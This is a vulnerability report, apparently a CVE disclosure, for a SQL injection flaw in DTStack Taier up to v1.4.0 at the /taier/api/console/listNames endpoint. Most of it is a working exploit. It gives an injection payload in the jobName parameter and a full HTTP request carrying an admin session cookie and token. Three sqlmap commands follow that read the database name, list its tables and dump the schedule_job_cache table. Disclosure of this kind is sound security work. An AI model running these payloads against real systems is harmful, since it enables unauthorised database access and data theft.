CVE-2024-41579.md

BUG_Author:

nerowander

Affected version:

<= v1.4.0

Vendor:

https://github.com/DTStack/Taier

Software:

https://github.com/DTStack/Taier/releases/download/v1.4.0/taier.tar.gz

Vulnerability File:

https://github.com/DTStack/Taier/blob/4af3e15f4c8b270479bf918555168d7fbc663807/taier-dao/src/main/resources/sqlmap/ScheduleJobCacheMapper.xml#L24

https://github.com/DTStack/Taier/blob/4af3e15f4c8b270479bf918555168d7fbc663807/taier-data-develop/src/main/java/com/dtstack/taier/develop/controller/console/ConsoleController.java#L63

https://github.com/DTStack/Taier/blob/4af3e15f4c8b270479bf918555168d7fbc663807/taier-data-develop/src/main/java/com/dtstack/taier/develop/service/console/ConsoleService.java#L164

Description:

Taier versions less than or equal to v1.4.0 has a SQL injection vulnerability in the /taier/api/console/listNames console interface.

Payload: jobName=111%27or/**/1=1%23

POST /taier/api/console/listNames?jobName=111%27or/**/1=1%23 HTTP/1.1
Host: 127.0.0.1:8090
sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "macOS"
Accept-Language: zh-CN
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: userId=1; username=admin%40dtstack.com; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ0ZW5hbnRfaWQiOiIxIiwidXNlcl9pZCI6IjEiLCJ1c2VyX25hbWUiOiJhZG1pbkBkdHN0YWNrLmNvbSIsImV4cCI6MTcyMjU0NjM4MCwiaWF0IjoxNzIwNzk0MzgwfQ.v57U_BL7OgrDWQmicdev4YrPADsScy9eKsAJE709bKo; tenantId=1; tenant_name=taier

Response：

The response body is as shown in the figure. Under the condition that the jobName does not enter bbb and ccc (the bbb and ccc data are test data and can be added by connecting to the database and executing the insert statement), the jobName with is_deleted=0 can be obtained through SQL injection in the form of "universal password" data

You can manually construct the request message (as above), or you can use the sqlmap tool. The sqlmap method is demonstrated here. The expected reproducibility results are as above.

Get the current database name

python3 sqlmap.py -u "http://127.0.0.1:8090/taier/api/console/listNames?jobName=1" --cookie="userId=1; username=admin@dtstack.com; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ0ZW5hbnRfaWQiOiIxIiwidXNlcl9pZCI6IjEiLCJ1c2VyX25hbWUiOiJhZG1pbkBkdHN0YWNrLmNvbSIsImV4cCI6MTcyMjU0NjM4MCwiaWF0IjoxNzIwNzk0MzgwfQ.v57U_BL7OgrDWQmicdev4YrPADsScy9eKsAJE709bKo; tenantId=1; tenant_name=taier" --dbms mysql --current-db --level 3 --risk 3 -p "jobName" --method=POST

Get all table names

python3 sqlmap.py -u "http://127.0.0.1:8090/taier/api/console/listNames?jobName=1" --cookie="userId=1; username=admin@dtstack.com; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ0ZW5hbnRfaWQiOiIxIiwidXNlcl9pZCI6IjEiLCJ1c2VyX25hbWUiOiJhZG1pbkBkdHN0YWNrLmNvbSIsImV4cCI6MTcyMjU0NjM4MCwiaWF0IjoxNzIwNzk0MzgwfQ.v57U_BL7OgrDWQmicdev4YrPADsScy9eKsAJE709bKo; tenantId=1; tenant_name=taier" --dbms mysql --current-db --level 3 --risk 3 -p "jobName" --method=POST -D "taier" --tables

Get all the data of a certain table (here, take the schedule_job_cache table as an example)

python3 sqlmap.py -u "http://127.0.0.1:8090/taier/api/console/listNames?jobName=1" --cookie="userId=1; username=admin@dtstack.com; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ0ZW5hbnRfaWQiOiIxIiwidXNlcl9pZCI6IjEiLCJ1c2VyX25hbWUiOiJhZG1pbkBkdHN0YWNrLmNvbSIsImV4cCI6MTcyMjU0NjM4MCwiaWF0IjoxNzIwNzk0MzgwfQ.v57U_BL7OgrDWQmicdev4YrPADsScy9eKsAJE709bKo; tenantId=1; tenant_name=taier" --dbms mysql --current-db --level 3 --risk 3 -p "jobName" --method=POST -D "taier" -T "schedule_job_cache" --dump